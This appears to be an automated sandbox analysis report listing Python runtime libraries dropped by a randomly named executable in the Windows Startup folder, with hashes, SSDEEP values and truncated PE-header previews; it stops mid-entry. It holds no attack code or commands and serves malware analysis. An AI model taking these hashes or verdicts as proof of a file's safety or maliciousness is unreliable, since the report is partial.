Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15360
Entropy (8bit):	5.133714807569085
Encrypted:	false
SSDEEP:	192:JZNGXEgvUh43G6coX2SSwmPL4V7wTdDlpaY2cqgWjvE:EVMhuGGF2L4STdDyYWgWjvE
MD5:	76C84B62982843367C5F5D41B550825F
SHA1:	B6DE9B9BD0E2C84398EA89365E9F6D744836E03A
SHA-256:	EBCD946F1C432F93F396498A05BF07CC77EE8A74CE9C1A283BF9E23CA8618A4C
SHA-512:	03F8BB1D0D63BF26D8A6FFF62E94B85FFB4EA1857EB216A4DEB71C806CDE107BA0F9CC7017E3779489C5CEF5F0838EDB1D70F710BCDEB629364FC288794E6AFE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%..... ......P.....................................................`......................................... 9.......9..d....`.......P..\|............p..,....3...............................1..@............0...............................text...X........................... ..`.rdata..(....0......."..............@..@.data........@.......2..............@....pdata..\|....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..,....p.......:..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Math\_modexp.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	35840
Entropy (8bit):	5.928082706906375
Encrypted:	false
SSDEEP:	768:8bEkzS7+k9rMUb8cOe9rs9ja+V/Mhjh56GS:8bEP779rMtcOCs0I/Mhf
MD5:	B41160CF884B9E846B890E0645730834
SHA1:	A0F35613839A0F8F4A87506CD59200CCC3C09237
SHA-256:	48F296CCACE3878DE1148074510BD8D554A120CAFEF2D52C847E05EF7664FFC6
SHA-512:	F4D57351A627DD379D56C80DA035195292264F49DC94E597AA6638DF5F4CF69601F72CC64FC3C29C5CBE95D72326395C5C6F4938B7895C69A8D839654CFC8F26
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N4.\|.U./.U./.U./.-a/.U./....U./A-...U./.U./!U./....U./....U./....U./0....U./0....U./0../.U./0....U./Rich.U./................PE..d......e.........." ...%.^...0......`.....................................................`..........................................~..\|...\...d...............................,....s...............................q..@............p..(............................text...8].......^.................. ..`.rdata.......p.......b..............@..@.data................v..............@....pdata..............................@..@.rsrc...............................@..@.reloc..,...........................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Protocol\_scrypt.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.799063285091512
Encrypted:	false
SSDEEP:	192:nkCfXASTMeAk4OepIXcADp/X6RcqgO5vE:ZJMcPepIXcAD563gO5vE
MD5:	BA46602B59FCF8B01ABB135F1534D618
SHA1:	EFF5608E05639A17B08DCA5F9317E138BEF347B5
SHA-256:	B1BAB0E04AC60D1E7917621B03A8C72D1ED1F0251334E9FA12A8A1AC1F516529
SHA-512:	A5E2771623DA697D8EA2E3212FBDDE4E19B4A12982A689D42B351B244EFBA7EFA158E2ED1A2B5BC426A6F143E7DB810BA5542017AB09B5912B3ECC091F705C6E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K............RQ.....U.....R............U......U......U..................=..........Rich...................PE..d....e.........." ...%............P.....................................................`..........................................8..d...$9..d....`.......P..4............p..,....3...............................1..@............0...............................text...x........................... ..`.rdata.......0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\PublicKey\_ec_ws.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	754688
Entropy (8bit):	7.624959985050181
Encrypted:	false
SSDEEP:	12288:I1UrmZ9HoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6h9:gYmzHoxJFf1p34hcrn5Go9yQO6L
MD5:	3F20627FDED2CF90E366B48EDF031178
SHA1:	00CED7CD274EFB217975457906625B1B1DA9EBDF
SHA-256:	E36242855879D71AC57FBD42BB4AE29C6D80B056F57B18CEE0B6B1C0E8D2CF57
SHA-512:	05DE7C74592B925BB6D37528FC59452C152E0DCFC1D390EA1C48C057403A419E5BE40330B2C5D5657FEA91E05F6B96470DDDF9D84FF05B9FD4192F73D460093C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&:..b[.Lb[.Lb[.Lk#sLd[.Lw$.M`[.L)#.Ma[.Lb[.LI[.Lw$.Mn[.Lw$.Mj[.Lw$.Ma[.LX..Mg[.LX..Mc[.LX..Lc[.LX..Mc[.LRichb[.L........................PE..d....e.........." ...%.n..........`.....................................................`..........................................p..d...tq..d...............0...............4...@Z...............................Y..@...............(............................text....l.......n.................. ..`.rdata...............r..............@..@.data................j..............@....pdata..0............r..............@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\PublicKey\_ed25519.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	27648
Entropy (8bit):	5.792654050660321
Encrypted:	false
SSDEEP:	384:hBwi/rOF26VZW1n0n/Is42g9qhrnW0mvPauYhz35sWJftjb1Ddsia15gkbQ0e1:/L/g28Ufsxg9GmvPauYLxtX1D/kf
MD5:	290D936C1E0544B6EC98F031C8C2E9A3
SHA1:	CAEEA607F2D9352DD605B6A5B13A0C0CB1EA26EC
SHA-256:	8B00C859E36CBCE3EC19F18FA35E3A29B79DE54DA6030AAAD220AD766EDCDF0A
SHA-512:	F08B67B633D3A3F57F1183950390A35BF73B384855EAAB3AE895101FBC07BCC4990886F8DE657635AD528D6C861BC2793999857472A5307FFAA963AA6685D7E8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..........)......................................R......R......RE.....R.....Rich...........PE..d....e.........." ...%.F...(......P.....................................................`..........................................j..0....k..d...............................,...pc..............................0b..@............`...............................text...xD.......F.................. ..`.rdata.."....`.......J..............@..@.data................\..............@....pdata...............d..............@..@.rsrc................h..............@..@.reloc..,............j..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\PublicKey\_ed448.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	67072
Entropy (8bit):	6.060461288575063
Encrypted:	false
SSDEEP:	1536:nqctkGACFI5t35q2JbL0UbkrwwOoKXyMH1B7M9rMdccdWxRLpq:nqctkGACFI5t35q2JbgrwwOoqLTM9rMh
MD5:	5782081B2A6F0A3C6B200869B89C7F7D
SHA1:	0D4E113FB52FE1923FE05CDF2AB9A4A9ABEFC42E
SHA-256:	E72E06C721DD617140EDEBADD866A91CF97F7215CBB732ECBEEA42C208931F49
SHA-512:	F7FD695E093EDE26FCFD0EE45ADB49D841538EB9DAAE5B0812F29F0C942FB13762E352C2255F5DB8911F10FA1B6749755B51AAE1C43D8DF06F1D10DE5E603706
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N4.\|.U./.U./.U./.-a/.U./....U./A-...U./.U./!U./....U./....U./....U./0....U./0....U./0../.U./0....U./Rich.U./................PE..d......e.........." ...%.....8......`........................................@............`.........................................`...h.......d.... .......................0..,.......................................@............................................text............................... ..`.rdata..*...........................@..@.data...............................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..,....0......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\PublicKey\_x25519.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10752
Entropy (8bit):	4.488437566846231
Encrypted:	false
SSDEEP:	96:tpVVdJvbrqTu6ZdpvY0IluLfcC75JiC4cs89EfqADwhDTAbcX6gn/7EC:5VddiT7pgTctdErDwDTicqgn/7
MD5:	289EBF8B1A4F3A12614CFA1399250D3A
SHA1:	66C05F77D814424B9509DD828111D93BC9FA9811
SHA-256:	79AC6F73C71CA8FDA442A42A116A34C62802F0F7E17729182899327971CFEB23
SHA-512:	4B95A210C9A4539332E2FB894D7DE4E1B34894876CCD06EEC5B0FC6F6E47DE75C0E298CF2F3B5832C9E028861A53B8C8E8A172A3BE3EC29A2C9E346642412138
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.h.r.h.r.h.{...p.h.g.i.p.h.9.i.q.h.r.i.V.h.g.m.y.h.g.l.z.h.g.k.q.h.H.`.s.h.H.h.s.h.H...s.h.H.j.s.h.Richr.h.........................PE..d....e.........." ...%............P........................................p............`..........................................'..P...0(..P....P.......@...............`..,...P#..............................."..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Util\_cpuid_c.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	4.730605326965181
Encrypted:	false
SSDEEP:	96:MJVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EVAElIijKDQGrbMZYJWJcX6gbW6s:CVddiT7pgTctEEaEDKDlMCWJcqgbW6
MD5:	4D9C33AE53B38A9494B6FBFA3491149E
SHA1:	1A069E277B7E90A3AB0DCDEE1FE244632C9C3BE4
SHA-256:	0828CAD4D742D97888D3DFCE59E82369317847651BBA0F166023CB8ACA790B2B
SHA-512:	BDFBF29198A0C7ED69204BF9E9B6174EBB9E3BEE297DD1EB8EB9EA6D7CAF1CC5E076F7B44893E58CCF3D0958F5E3BDEE12BD090714BEB5889836EE6F12F0F49E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`..........................................'..\|....'..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Util\_strxor.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	4.685843290341897
Encrypted:	false
SSDEEP:	96:6ZVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EMz3DHWMoG4BcX6gbW6O:IVddiT7pgTctEEO3DLoHcqgbW6
MD5:	8F4313755F65509357E281744941BD36
SHA1:	2AAF3F89E56EC6731B2A5FA40A2FE69B751EAFC0
SHA-256:	70D90DDF87A9608699BE6BBEDF89AD469632FD0ADC20A69DA07618596D443639
SHA-512:	FED2B1007E31D73F18605FB164FEE5B46034155AB5BB7FE9B255241CFA75FF0E39749200EB47A9AB1380D9F36F51AFBA45490979AB7D112F4D673A0C67899EF4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`.........................................`'..t....'..P....P.......@...............`..,...."...............................!..@............ ...............................text...x........................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	119192
Entropy (8bit):	6.6016214745004635
Encrypted:	false
SSDEEP:	1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
MD5:	BE8DBE2DC77EBE7F88F910C61AEC691A
SHA1:	A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
SHA-256:	4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
SHA-512:	0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\VCRUNTIME140_1.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	49528
Entropy (8bit):	6.662491747506177
Encrypted:	false
SSDEEP:	768:wPIyGVrxmKqOnA4j3z6Su77A+i0QLxi9z9Rtii9zn+:fBr87uW1nA8QLx+zrti+zn+
MD5:	F8DFA78045620CF8A732E67D1B1EB53D
SHA1:	FF9A604D8C99405BFDBBF4295825D3FCBC792704
SHA-256:	A113F192195F245F17389E6ECBED8005990BCB2476DDAD33F7C4C6C86327AFE5
SHA-512:	BA7F8B7AB0DEB7A7113124C28092B543E216CA08D1CF158D9F40A326FB69F4A2511A41A59EA8482A10C9EC4EC8AC69B70DFE9CA65E525097D93B819D498DA371
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9@.W}!..}!..}!...S...!..{....!..tYJ.v!..}!..N!..{...x!..{...z!..{...f!..{...\|!..{.&.\|!..{...\|!..Rich}!..................PE..d.....v..........." ...&.<...8.......B...................................................`A........................................Pm.......m..x....................r..xO......D....c..p...........................`b..@............P..`............................text...p:.......<.................. ..`.rdata...#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\_asyncio.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	71448
Entropy (8bit):	6.247581706260346
Encrypted:	false
SSDEEP:	1536:rRaPPkDN3nkiP6djtX5IkTIL1yUvGJtIAOnT7SyqWx5:9anmN3nkikjV5IkTIL1yUuJtIAOnTgi
MD5:	209CBCB4E1A16AA39466A6119322343C
SHA1:	CDCCE6B64EBF11FECFF739CBC57E7A98D6620801
SHA-256:	F7069734D5174F54E89B88D717133BFF6A41B01E57F79957AB3F02DAA583F9E2
SHA-512:	5BBC4EDE01729E628260CF39DF5809624EAE795FD7D51A1ED770ED54663955674593A97B78F66DBF6AE268186273840806ED06D6F7877444D32FDCA031A9F0DA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z2.T.S...S...S...+r..S...,...S...,...S...,...S...,...S..$....S..U+...S...S...S..$....S..$....S..$....S..$....S..Rich.S..........PE..d......e.........." ...%.f................................................... ......')....`.............................................P......d......................../..............T...........................@...@............................................text...=d.......f.................. ..`.rdata..pO.......P...j..............@..@.data...(...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\_bz2.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	84760
Entropy (8bit):	6.5874715807724025
Encrypted:	false
SSDEEP:	1536:RS7z7Sj2u5in5IVfC83zYxzbdK87kW1IACVw7SyrxX:I7z+jum3MJdN7kW1IACVwX
MD5:	59D60A559C23202BEB622021AF29E8A9
SHA1:	A405F23916833F1B882F37BDBBA2DD799F93EA32
SHA-256:	706D4A0C26DD454538926CBB2FF6C64257C3D9BD48C956F7CABD6DEF36FFD13E
SHA-512:	2F60E79603CF456B2A14B8254CEC75CE8BE0A28D55A874D4FB23D92D63BBE781ED823AB0F4D13A23DC60C4DF505CBF1DBE1A0A2049B02E4BDEC8D374898002B1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R...S..R.....R...W..R...V..R...Q..R...S..R..S..R..S..R..._..R...R..R......R...P..R.Rich.R.........................PE..d......e.........." ...%.....^......\|........................................P......-B....`.............................................H............0....... ..,......../...@..........T...........................p...@............................................text...k........................... ..`.rdata..p>.......@..................@..@.data...............................@....pdata..,.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\_cffi_backend.cp312-win_amd64.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	182784
Entropy (8bit):	6.193615170968096
Encrypted:	false
SSDEEP:	3072:YRAMUp3K6YoDssyudy4VcRG+nR3hnW3mjwwOdkS9S7iSSTLkK/jftw3buz:Y6MyK65ssy+MG+LnSUwjD9zSSTLL/jl8
MD5:	0572B13646141D0B1A5718E35549577C
SHA1:	EEB40363C1F456C1C612D3C7E4923210EAE4CDF7
SHA-256:	D8A76D1E31BBD62A482DEA9115FC1A109CB39AF4CF6D1323409175F3C93113A7
SHA-512:	67C28432CA8B389ACC26E47EB8C4977FDDD4AF9214819F89DF07FECBC8ED750D5F35807A1B195508DD1D77E2A7A9D7265049DCFBFE7665A7FD1BA45DA1E4E842
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(...I.C.I.C.I.C.1MC.I.C.<.B.I.C.&#C.I.C.<.B.I.C.<.B.I.C.<.B.I.C.1.B.I.C.4.B.I.C.I.C I.C.<.B.I.C.1KC.I.C.<.B.I.C.<!C.I.C.<.B.I.CRich.I.C................PE..d...g..e.........." .........@......`........................................@............`..........................................w..l....w....... ..........l............0.......]...............................]..8............................................text............................... ..`.rdata..............................@..@.data...h].......0...\|..............@....pdata..l...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\_ctypes.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	125208
Entropy (8bit):	6.128664719423826
Encrypted:	false
SSDEEP:	3072:DGR936Xz4mHFK0K+bRFOoP+Szlf/EZZBKYyucV6rOoZIALPEA:qQHLK+bvvPNhf/Ei6CoX
MD5:	2A834C3738742D45C0A06D40221CC588
SHA1:	606705A593631D6767467FB38F9300D7CD04AB3E
SHA-256:	F20DFA748B878751EA1C4FE77A230D65212720652B99C4E5577BCE461BBD9089
SHA-512:	924235A506CE4D635FA7C2B34E5D8E77EFF73F963E58E29C6EF89DB157BF7BAB587678BB2120D09DA70594926D82D87DBAA5D247E861E331CF591D45EA19A117
Malicious:	false
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......x...<...<...<...5.*.:...)...>...)...0...)...4...)...8.......>...w...=...w...:.......?...<..........:.......=.....F.=.......=...Rich<...........................PE..d......e.........." ...%............p_..............................................]R....`.........................................``.......`.........................../......p.......T...............................@............................................text............................... ..`.rdata..Xl.......n..................@..@.data....4.......0...j..............@....pdata..............................@..@.rsrc...............................@..@.reloc..p...........................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\_decimal.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	252696
Entropy (8bit):	6.564448148079112
Encrypted:	false
SSDEEP:	6144:Agvd9YyMipyD41q8xDiw9qWM53pLW1AQRRRrBoZtcr3:AQ8yryD47hix4orcr3
MD5:	F930B7550574446A015BC602D59B0948
SHA1:	4EE6FF8019C6C540525BDD2790FC76385CDD6186
SHA-256:	3B9AD1D2BC9EC03D37DA86135853DAC73B3FE851B164FE52265564A81EB8C544
SHA-512:	10B864975945D6504433554F9FF11B47218CAA00F809C6BCE00F9E4089B862190A4219F659697A4BA5E5C21EDBE1D8D325950921E09371ACC4410469BD9189EE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........mBP\.,.\.,.\.,.Ut..R.,.Is-.^.,.Is).Q.,.Is(.T.,.Is/.X.,.f.-._.,..t-.^.,.\.-...,.f./.].,.f.!.S.,.f.,.].,.f...].,.f...].,.Rich\.,.........PE..d......e.........." ...%.t...<......................................................6.....`.........................................@T..P....T..................0'......./......P...@...T...............................@............................................text....r.......t.................. ..`.rdata...............x..............@..@.data....*...p...$...P..............@....pdata..0'.......(...t..............@..@.rsrc...............................@..@.reloc..P...........................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\_hashlib.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	65816
Entropy (8bit):	6.242741772115205
Encrypted:	false
SSDEEP:	1536:MElYij3wz91lBafLEmIRhtIAOIW7SybpxC:hYZBaTEmghtIAOIWE
MD5:	B0262BD89A59A3699BFA75C4DCC3EE06
SHA1:	EB658849C646A26572DEA7F6BFC042CB62FB49DC
SHA-256:	4ADFBBD6366D9B55D902FC54D2B42E7C8C989A83016ED707BD7A302FC3FC7B67
SHA-512:	2E4B214DE3B306E3A16124AF434FF8F5AB832AA3EEB1AA0AA9B49B0ADA0928DCBB05C57909292FBE3B01126F4CD3FE0DAC9CC15EAEA5F3844D6E267865B9F7B1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........u...&...&...&.}&...&..'...&..'...&..'...&..'...&...'...&.x.'...&...&}..&.x.'...&.x.'...&.x.&...&.x.'...&Rich...&........................PE..d.....e.........." ...%.T..........P@....................................................`.............................................P.............................../......X...@}..T............................\|..@............p..(............................text....S.......T.................. ..`.rdata..&O...p...P...X..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\_lzma.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	159512
Entropy (8bit):	6.846323229710623
Encrypted:	false
SSDEEP:	3072:Fik7me1FFD+znfF9mNo+Mu6tmxzE41IAZ1Ak:FikSiUNYO+J1E4b
MD5:	B71DBE0F137FFBDA6C3A89D5BCBF1017
SHA1:	A2E2BDC40FDB83CC625C5B5E8A336CA3F0C29C5F
SHA-256:	6216173194B29875E84963CD4DC4752F7CA9493F5B1FD7E4130CA0E411C8AC6A
SHA-512:	9A5C7B1E25D8E1B5738F01AEDFD468C1837F1AC8DD4A5B1D24CE86DCAE0DB1C5B20F2FF4280960BC523AEE70B71DB54FD515047CDAF10D21A8BEC3EBD6663358
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......RH:..)T..)T..)T..Q...)T..VU..)T..VQ..)T..VP..)T..VW..)T.,.U..)T.]QU..)T..)U.s)T.,.Y.,)T.,.T..)T.,....)T.,.V..)T.Rich.)T.........PE..d.....e.........." ...%.d...........6....................................................`......................................... %..L...l%..x....p.......P.......@.../......4.......T...............................@............................................text....b.......d.................. ..`.rdata..............h..............@..@.data...(....@......................@....pdata.......P....... ..............@..@.rsrc........p.......4..............@..@.reloc..4............>..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\_multiprocessing.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	35096
Entropy (8bit):	6.461229529356597
Encrypted:	false
SSDEEP:	768:OgYvrenSE0PXxxQ0zi+mdIAWtd5YiSyviCAMxkEj:vYTQShxQ0zlmdIAWtD7SyKAxv
MD5:	4CCBD87D76AF221F24221530F5F035D1
SHA1:	D02B989AAAC7657E8B3A70A6EE7758A0B258851B
SHA-256:	C7BBCFE2511FD1B71B916A22AD6537D60948FFA7BDE207FEFABEE84EF53CAFB5
SHA-512:	34D808ADAC96A66CA434D209F2F151A9640B359B8419DC51BA24477E485685AF10C4596A398A85269E8F03F0FC533645907D7D854733750A35BF6C691DE37799
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........*..y..y..y..y..y...x..y...x..y...x..y...x..y.J.x..y..y..y...x..y.J.x..y.J.x..y.Jky..y.J.x..yRich..y................PE..d......e.........." ...%.....>......P...............................................^.....`.........................................0E..`....E..x............p.......Z.../...........4..T............................3..@............0...............................text............................... ..`.rdata..r ...0..."..."..............@..@.data........`.......D..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\_overlapped.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	55576
Entropy (8bit):	6.342203411267264
Encrypted:	false
SSDEEP:	1536:wXRnts3McbN6w/xzWssXZdR1r3RIAXtI7SyNxQ:IRvcsXZdR1rRIAXtI6
MD5:	61193E813A61A545E2D366439C1EE22A
SHA1:	F404447B0D9BFF49A7431C41653633C501986D60
SHA-256:	C21B50A7BF9DBE1A0768F5030CAC378D58705A9FE1F08D953129332BEB0FBEFC
SHA-512:	747E4D5EA1BDF8C1E808579498834E1C24641D434546BFFDFCF326E0DE8D5814504623A3D3729168B0098824C2B8929AFC339674B0D923388B9DAC66F5D9D996
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j.{..w(..w(..w(.s.(..w(.tv)..w(.tr)..w(.ts)..w(.tt)..w(.v)..w(..v(..w(.sv)..w(.ss)..w(.z)..w(.w)..w(..(..w(.u)..w(Rich..w(........................PE..d......e.........." ...%.L...`............................................................`.............................................X...X............................/......(....f..T............................e..@............`...............................text....J.......L.................. ..`.rdata..D8...`...:...P..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\_queue.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	32536
Entropy (8bit):	6.4674944702653665
Encrypted:	false
